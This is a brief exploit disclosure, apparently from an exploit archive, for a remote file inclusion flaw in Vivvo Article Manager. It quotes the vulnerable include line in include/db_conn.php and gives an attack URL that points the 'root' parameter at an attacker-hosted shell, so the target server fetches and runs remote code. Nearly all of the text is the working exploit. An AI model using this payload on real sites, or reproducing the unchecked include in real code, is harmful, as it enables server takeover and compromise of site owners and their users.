Codesnippet of vulnerable script ("./include/db_conn.php"):

if (file_exists($ext_base_conf_file)) include_once($ext_base_conf_file);
================================================== =================================================
Exploit:

http://victim.com/ [Vivvo Article Manager Path] / include / db_conn.php?root=[SHELL_URL]?
================================================== =================================================